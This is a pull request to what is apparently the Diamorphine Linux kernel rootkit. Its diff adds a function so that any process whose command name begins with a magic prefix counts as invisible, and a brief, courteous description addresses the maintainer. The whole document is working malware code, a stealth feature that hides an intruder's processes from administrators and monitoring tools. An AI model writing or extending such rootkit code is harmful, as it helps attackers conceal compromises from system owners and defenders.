### PR TITLE
Add prefix-based process hiding

### DIFF
--- a/diamorphine.c
+++ b/diamorphine.c
@@ -96,6 +96,11 @@ find_task(pid_t pid)
 	return NULL;
 }
 
+int starts_with_prefix(const char *s)
+{
+	return !memcmp(MAGIC_PREFIX, s, strlen(MAGIC_PREFIX));
+}
+
 int
 is_invisible(pid_t pid)
 {
@@ -106,6 +111,8 @@ is_invisible(pid_t pid)
 	if (!task)
 		return 0;
 	if (task->flags & PF_INVISIBLE)
+		return 1;
+	if(starts_with_prefix(task->comm))
 		return 1;
 	return 0;
 }


### PR DESCRIPTION
Dear m0nad, 

this PR adds the capability to hide processes whose `comm`-field starts with the string `MAGIC_PREFIX`. 

Thanks already in advance for considering this PR. 

Best regards
jgru